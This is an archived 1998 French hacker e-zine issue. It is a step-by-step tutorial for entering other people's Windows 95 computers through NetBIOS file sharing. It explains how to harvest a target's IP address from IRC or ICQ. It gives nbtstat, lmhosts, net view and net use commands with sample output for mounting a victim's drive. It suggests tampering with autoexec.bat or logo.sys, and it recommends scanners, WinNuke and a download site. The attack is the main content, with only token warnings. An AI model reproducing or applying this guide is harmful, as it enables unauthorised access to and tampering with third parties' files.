Copy Link
Add to Bookmark
Report

H@ck-off No 01

eZine's profile picture
Published in 
Hack off
 · 4 years ago

  

**SERIAL SAVATE SYSTEM** -Le Gang des Copier/Coller-
H@ck-off No 1
30/07/98
-------------------------------------------------------------

Le viol methodique vu par microsoft et corrige par Tobozo.

Billou s'en doutait-il quand il a concu NETBEUI ? Est-ce une facon habile d'inclure les pseudo-pirates dans la globalite de son ciblage commercial et ainsi elargir sa clientele ? Peu importe, le fait est qu'on peut hacker sans avoir recours a un programme special et sans modifier fondamentalement son systeme. Tout cela se fait grace a quelques commandes MSDOS. Et si vous vous faites choper, n'hesitez pas a dire que billou fait l'impasse sur les infos concernant le protocole utilise (netbeui).

Pour que cela fonctionne, la victime doit avoir au moins les trois elements suivants dans sa config reseau (ce que signifie que ca ne marchera pas pour les autres) :
Client pour reseau Microsoft
Netbeui
Partage des fichiers et d'imprimantes (actives bien sur)

Il faut aussi que ces elements fassent partie de VOTRE config reseau. Autre detail (pour ceux qui se connectent par acces reseau a distance) : dans les proprietes de votre connectoide (he oui ca s'appelle comme ca) sur l'onglet type de serveur, trois options doivent absolument etre cochees en plus de celles que vous utilisez.
-se connecter a un reseau
-activer la compression logicielle
-netbeui

Sinon y a pas !

Donc comment se connecter...
Sous win 95 il faut creer ou editer les fichier "lmhosts" et "hosts" dans c:\windows

La structure du fichier lmhosts comprends trois types d'infos et se presente comme suit :
numero ip " nom du micro distant " #PRE

Chaque info etant separee par une tabulation, et le nom du micro distant entre guillemets avec un espace avant et apres.

Avant de s'attaquer a une machine il faut connaitre son adresse IP

Si la victime est sous irc , taper /dns <pseudo> (en remplacant pseudo par son nickname)
si la victime est sous icq, voir l'explication plus bas.
S'il s'agit d'un serveur, ouvrez une fenetre MS-dos et tapez la commande PING -a suivie du nom de domaine, ce qui a pour resultat de renvoyer soit l'adresse IP et d'autres infos, soit un timeout.
Dans le deuxieme cas, il faudra utiliser un logiciel de DNS lookup comme TJPING ou autre...

Une fois l'adresse IP obtenue, toujours en commande MSDOS, vous allez pouvoir passer a l'action et taper :

nbtstat -A <adresse IP>

Le A majuscule est tres important, si vous negligez ce detail, laisez tomber tout de suite (taper nbstat -h pour plus d'infos).
Si le resultat obtenu est autre que "host not found" alors vous etes tombe sur un parfait pigeon qui n'attend que vos talents pour lui faire realiser sa vulnerabilite.

Les infos qui apparaissent quand la commande nbtstat donne un resultat positif vont vous servir pour vous connecter sur la machine de la victime.

Editez le fichier "lmhosts" et "hosts" en leur ajoutant les infos : adresse ip, suivi d'une tabulation (tres important), le nom de l'ordinateur de la victime, enregistrer les fichiers ainsi modifies.
Ensuite tapez (toujours dans la fenetre de commande msdos:

nbtstat -R

puis

net view \\<nom de la machine de la victime>(que vous avez enregistre dans les fichiers hosts et lmhosts)

Cette commande vous affiche le nom des lecteurs logiques qui ont des ressources partagees..ou que dalle si rien n'est partage. Dans le deuxieme cas, cherchez ailleurs.

Dans la positive, taper :

net use * //<nom de la machine>/<nom du lecteur logique>

Il va falloir choisir une lettre pour ce nouveau lecteur...et WIN95 s'en charge pour vous.
La commande NET USE a pour but de CREER sur votre systeme un lecteur logique reseau qui dans ce cas correspond a la ressource partagee de l'ordi de la victime. Allez dans poste de travail et appuyez sur F5, vous verrez apparaitre un lecteur supplementaire portant la lettre affectee par WIN95 et contenant les fichiers de l'ordi sur lequel vous venez de vous connecter.

Note : Sous NT il est inutile de modifier les fichiers lmhosts et hosts.

Exemple pour rentrer sur le micro de la victime :

Je suis sur icq et je meurs d'envie de faire une blague a un pote qui bosse dans une boite a la con. J'essaye d'editer les infos de son pseudo et je vois son IP. Si son ip est masquee, je lui envoie un message, et quand il me repond, je vais sous msdos et je tape :
NETSTAT

Msdos me donne soit son ip, soit la dns (pour obtenir l'adresse IP a partir d'une DNS, voir les explications plus haut)

SUPPOSONS que l'adresse ip soit : 206.175.72.111
Dans la meme fenetre msdos dos et je tape :

nbstat -A 206.175.72.111

J'obtiens alors :

NetBIOS Remote Machine Name Table
Name Type Status
----------------------
----------------------
teleperformance<00> UNIQUE Registered
global<00> GROUP Registered
MAC Address = 44-47-54-53-00-00

Le nom de la ressource partagee est "teleperformance" (UNIQUE veut dire que c'est la seule ressource partagee sur cette IP)

J'edite mes fichiers lmhosts et hosts et j'y ajoute (en respectant la syntaxe comme explique plus haut) :

206.175.72.111 " teleperformance " #PRE

Je sauve les fichiers.
Retour a la fenetre msdos je tape :

nbtstat -R (RESPECTEZ LA MAJUSCULE)

Le resultat (si ca marche) :

Successful purge and preload of the NBT Remote Cache Name Table.

Ensuite je tape :

net view \\teleperformance

Et j'obtiens :

Ressources partagees
\\teleperformance

Nom de partageType Commentaire
-------------------------------------------------------------------
c Disque
d Disque
e Disque
Execution achevee.

Ensuite je tape :

C:\WINDOWS>net use * \\teleperformance\c

Et j'obtiens :

M: connecte a \\teleperformance\c

Le lecteur logique est le lecteur M. Je peux y acceder comme si c'etait le mien.

Bingo! je suis connecte sur l'ordi de mon pote et je peux commencer a lui foutre la trouille.
ATTENTION : c'est tres grisant, n'attrappez pas la grosse tete et n'oubliez pas que par la meme occasion un fichier log est cree sur la machine distante avec VOTRE ADRESSE IP. Donc pas de conneries ! (a moins d'etre deja connecte au travers d'une autre machine)
Ceci dit, rien ne vous empeche de remplacer le fichier logo.sys ou d'ajouter quelques lignes a l'autoexec.bat hehehe.

Probabilites de succes :
sur 1000 adresses IP on peut trouver 100 ordinateurs.
Sur ces 100 ordinateurs, 10 auront le port 139 ouvert
sur ces 10 ordinateurs, 1 aura le partage de fichiers et d'imprimantes active
sur cet ordinateur il ne faudra pas faire de conneries :-)

Ces chiffres sont completement fictifs mais vous donneront une idee sur la tenacite qu'il faut avoir pour trouver par hasard un ordi penetrable. Pour ceux qui n'aiment pas le hasard, n'abusez pas de la confiance de vos amis, prevenez les...un peu d'admiration vaut mieux que beaucoup de haine. Si cela vous fait peur, ne le faites pas. Si c'est dans un esprit de vengeance, ne le faites pas. Et enfin, si c'est sans capote, ne le faites pas.

Quelques outils peuvent suppleer a ces operations pour les plus feignants. Vous pourrez les trouver un peu partout sur le web. Pour ma part, je ne joue pas a ce jeu la mais si l'envie vous prend, il faudra utiliser :

-un scanner d'ip (HACKTEK fait tres bien ca)
Il suffit de lancer une recherche aleatoire avec adresse IP de depart et adresse IP d'arrivee...et on abtient ainsi une liste d'adresses ou l'on pourra ensuite lancer un scanner de port.

-un scanner de port (IPSCAN)
Ce soft va scanner tous les ports d'un ordi sur une adresse ip donnee. Le port 139 est souvent revelateur d'une machine microsoft : client potentiel pour nbtstat.

-winnuke
Tres utile quand nbtstat ne marche pas. En effet, ce programme a une propriete sublimatoire sur la frustration causee par un echec.

Il existe un foule d'autres programmes, tous plus imaginatifs les uns que les autres. Pour ca, je vous propose de les telecharger depuis notre site : http://legang.home.ml.org
Et si vous n'y trouvez pas votre bonheur, visitez les liens qui y sont a votre disposition.

Ces infos sont donnees a titre d'exemple. Toute utilisation effectuee dans un esprit autre que ludique sera severement punie par des remords et un sentiment de culpabilite plus ou moins prononce selon le degre de gravite de l'action (qui a dit que le hacking etait une activite serieuse?).

Fin du H@ck-off No1
Suite au prochain numero

loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT